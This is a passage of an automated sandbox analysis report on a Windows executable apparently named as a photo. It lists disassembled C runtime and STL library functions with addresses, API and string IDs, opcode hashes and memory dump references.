                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CriticalException@8InitializeSectionThrow_mallocstd::exception::exception
                                                                • String ID: -+@
                                                                • API String ID: 2633512587-3480793176
                                                                • Opcode ID: 3aa8bf418dff3b2c9a65847512dcf1f503cfb9cfe81fa4de42d84f085597dc09
                                                                • Instruction ID: 6f02a8d28846de20d55d27ba3f4f110e6c8e3c0e3156ffd47ee520daefa59033
                                                                • Opcode Fuzzy Hash: 3aa8bf418dff3b2c9a65847512dcf1f503cfb9cfe81fa4de42d84f085597dc09
                                                                • Instruction Fuzzy Hash: 8431BFB19007149FCB11EF68DC41A9EBBF4FB48714F10462FE815E3381E7B9AA048B96
                                                                Function 00461C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • std::exception::exception.LIBCMT ref: 00461D46
                                                                • __CxxThrowException@8.LIBCMT ref: 00461D5B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                • String ID: $Pc
                                                                • API String ID: 4063778783-2919586456
                                                                • Opcode ID: 5856a4f42f169acfc3912500f01a342460c1083d643e575e613dadeafa49471d
                                                                • Instruction ID: f98cc67369f290279659b648c516dfad842bd5f9503e4b2d22c942a93e504296
                                                                • Opcode Fuzzy Hash: 5856a4f42f169acfc3912500f01a342460c1083d643e575e613dadeafa49471d
                                                                • Instruction Fuzzy Hash: 7021A2B1E046449FC714DF58D881AADBBB6FB09724F04456BE81587390D73A6904CBD5
                                                                Function 00481F90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • std::exception::exception.LIBCMT ref: 0048203D
                                                                • __CxxThrowException@8.LIBCMT ref: 00482052
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                • String ID: c,H
                                                                • API String ID: 4063778783-4108717671
                                                                • Opcode ID: e83985399e0dd2eca6c8357d1d003b195b086c8db2e7f95ce98872740799fdaf
                                                                • Instruction ID: 4bf78a1fb48b707ae4f1302f5ea2f0ce2579541da25ad8c398e956059674a931
                                                                • Opcode Fuzzy Hash: e83985399e0dd2eca6c8357d1d003b195b086c8db2e7f95ce98872740799fdaf
                                                                • Instruction Fuzzy Hash: 2321A1B1900609AFCB14EF99C881ADEFBF4FB08750F10892FE41593740D774AA44CBA4
                                                                Function 0046BE90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID: @Mc
                                                                • API String ID: 176396367-515331448
                                                                • Opcode ID: 402372fb69ecb91549df6e62d656d7945343f7dcc9527f374d880a1706672386
                                                                • Instruction ID: a26834e540db73737f8a9598449bf765dfac309c37eee9957a544a08feaac59d
                                                                • Opcode Fuzzy Hash: 402372fb69ecb91549df6e62d656d7945343f7dcc9527f374d880a1706672386
                                                                • Instruction Fuzzy Hash: 56216071D0021897DB04EBAADC116DEB7B5AF04708F44882EE815A7350EB7969058BDA
                                                                Function 00455F00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID: url$Ec
                                                                • API String ID: 176396367-432377163
                                                                • Opcode ID: 3369eb48cbb3e796d0e889927ecdb28644b6b456deb65c54ca18108ae89763bc
                                                                • Instruction ID: 9c23f3f415915cb8467350bb3685408b37f760ec840c370ded3195a2870c64a2
                                                                • Opcode Fuzzy Hash: 3369eb48cbb3e796d0e889927ecdb28644b6b456deb65c54ca18108ae89763bc
                                                                • Instruction Fuzzy Hash: 1221AF71D046589FDB00DFA9D8947EEFBB4FB08318F00452BE815A3381D778A948CB99
                                                                Function 0040F618 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Xinvalid_argument_memmovestd::_
                                                                • String ID: string too long
                                                                • API String ID: 256744135-2556327735
                                                                • Opcode ID: 27f95f7eeb5be6793293a01b931ed15dc6fa06860ec7878d154502a7ab6b092e
                                                                • Instruction ID: 2e4a01870d01a8f3fcf4d12bec062dcf225e78b1afbef5d3d809ae9fd865e4f9
                                                                • Opcode Fuzzy Hash: 27f95f7eeb5be6793293a01b931ed15dc6fa06860ec7878d154502a7ab6b092e
                                                                • Instruction Fuzzy Hash: B911B6313006009BDB309E2DC94092AB7E9EF85714B100E3FF442A76E1C77AD81B8B99
                                                                Function 0040CA50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040CA6A
                                                                  • Part of subcall function 004890F2: std::exception::exception.LIBCMT ref: 00489107
                                                                  • Part of subcall function 004890F2: __CxxThrowException@8.LIBCMT ref: 0048911C
                                                                  • Part of subcall function 004890F2: std::exception::exception.LIBCMT ref: 0048912D
                                                                • _memmove.LIBCMT ref: 0040CAC5
                                                                Strings
                                                                • invalid string position, xrefs: 0040CA65
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                • String ID: invalid string position
                                                                • API String ID: 1785806476-1799206989
                                                                • Opcode ID: 15bf9d3652101f7ccfc41ee0dbbd2078debc1aa29cd1471adf43be7f8a4786d4
                                                                • Instruction ID: 2f220d786a752a7543bbc748ac7424f3a53ee684621938ae87e3cdb6ab4871af
                                                                • Opcode Fuzzy Hash: 15bf9d3652101f7ccfc41ee0dbbd2078debc1aa29cd1471adf43be7f8a4786d4
                                                                • Instruction Fuzzy Hash: 40119031304218DBCB14DF189CC1B2AB3A6EB45714B100A3FF916AB3C2C6B8DD418B9D
                                                                Function 00401664 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Xinvalid_argument_memmovestd::_
                                                                • String ID: string too long
                                                                • API String ID: 256744135-2556327735
                                                                • Opcode ID: 2cf98183c0679be6b89f6e60eccc9b1ad05d4a9a527100dcf8fb13c624aac1e3
                                                                • Instruction ID: e7d8fd86c3683f7acd4c700acd8d54e66db1e9e26c382f84a35ce5fcf8a4d793
                                                                • Opcode Fuzzy Hash: 2cf98183c0679be6b89f6e60eccc9b1ad05d4a9a527100dcf8fb13c624aac1e3
                                                                • Instruction Fuzzy Hash: 861182303006049BCA209E6CDD8596AB7E9BF457487180E3FF946A76E1DB3A9904CB99
                                                                Function 00401A8E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00401AA7
                                                                  • Part of subcall function 004890F2: std::exception::exception.LIBCMT ref: 00489107
                                                                  • Part of subcall function 004890F2: __CxxThrowException@8.LIBCMT ref: 0048911C
                                                                  • Part of subcall function 004890F2: std::exception::exception.LIBCMT ref: 0048912D
                                                                  • Part of subcall function 00401A22: std::_Xinvalid_argument.LIBCPMT ref: 00401A35
                                                                • _memmove.LIBCMT ref: 00401B02
                                                                Strings
                                                                • invalid string position, xrefs: 00401AA2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                • String ID: invalid string position
                                                                • API String ID: 3404309857-1799206989
                                                                • Opcode ID: b2dae156bca62dd8ce6d456be092fcf947d8d16a29ead440ddb4189e4917b527
                                                                • Instruction ID: 6f7ad25470a8d8caa5355efcfcaa467bdbeef50952f416e9247d2ba693993776
                                                                • Opcode Fuzzy Hash: b2dae156bca62dd8ce6d456be092fcf947d8d16a29ead440ddb4189e4917b527
                                                                • Instruction Fuzzy Hash: D311C4313002149BCB20EE6CD8C086AB3F5FF45364710063FE806AB2A1E778ED45CBA9
                                                                Function 00414E8E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CountFocusTick
                                                                • String ID: killfocus
                                                                • API String ID: 3897604831-1616503811
                                                                • Opcode ID: 1fe98ecd5c7fa893c2ee0b057238011b85bb67b1d1198d2e2d8391ac2cf6ac23
                                                                • Instruction ID: d9e03b9e95e3c9ce006716debee4336393ee26da5b9aaaa7e130d5c3ac33c9c8
                                                                • Opcode Fuzzy Hash: 1fe98ecd5c7fa893c2ee0b057238011b85bb67b1d1198d2e2d8391ac2cf6ac23
                                                                • Instruction Fuzzy Hash: 5E118E316047419FD720DF2AC848B8BFBE5EFC9718F00492EE49687661D7B4A548CBA6
                                                                Function 0040B054 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_catch.LIBCMT ref: 0040B05B
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040B071
                                                                  • Part of subcall function 004890A5: std::exception::exception.LIBCMT ref: 004890BA
                                                                  • Part of subcall function 004890A5: __CxxThrowException@8.LIBCMT ref: 004890CF
                                                                  • Part of subcall function 004890A5: std::exception::exception.LIBCMT ref: 004890E0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: std::exception::exception$Exception@8H_prolog3_catchThrowXinvalid_argumentstd::_
                                                                • String ID: vector<T> too long
                                                                • API String ID: 1877048013-3788999226
                                                                • Opcode ID: 8de1dc7b9e51c6ebf70dc8aea16b80eb6961e779ff8fb9888b746ea1454cf001
                                                                • Instruction ID: 3a47d4ab0abe1bb319327443536b897c2dde75a77c1a5120c99c5a7f7161d3bd
                                                                • Opcode Fuzzy Hash: 8de1dc7b9e51c6ebf70dc8aea16b80eb6961e779ff8fb9888b746ea1454cf001
                                                                • Instruction Fuzzy Hash: E111A976B003058BDB24EF69C58592EF7E1EF54704F20483EF595A7291CA7ADD408758
                                                                Function 0040C9D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040C9EE
                                                                  • Part of subcall function 004890F2: std::exception::exception.LIBCMT ref: 00489107
                                                                  • Part of subcall function 004890F2: __CxxThrowException@8.LIBCMT ref: 0048911C
                                                                  • Part of subcall function 004890F2: std::exception::exception.LIBCMT ref: 0048912D
                                                                • _memmove.LIBCMT ref: 0040CA27
                                                                Strings
                                                                • invalid string position, xrefs: 0040C9E9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                • String ID: invalid string position
                                                                • API String ID: 1785806476-1799206989
                                                                • Opcode ID: 2d4cebefb27432a3a89c6cd0dee6f45749941ee974edaa8841a1e0beff27ff3c
                                                                • Instruction ID: a2183fcce454a750432eb70432dca8dd0522c714e78b7713f170b61536e3b57f
                                                                • Opcode Fuzzy Hash: 2d4cebefb27432a3a89c6cd0dee6f45749941ee974edaa8841a1e0beff27ff3c
                                                                • Instruction Fuzzy Hash: C701F931300254CBD724DF5CD9C092AB3A6E7C17103204B3ED481E7681DA78EC469B98
                                                                Function 004024D4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004024DB
                                                                  • Part of subcall function 0040248D: __EH_prolog3.LIBCMT ref: 00402494
                                                                  • Part of subcall function 00402412: __localtime64_s.LIBCMT ref: 00402452
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
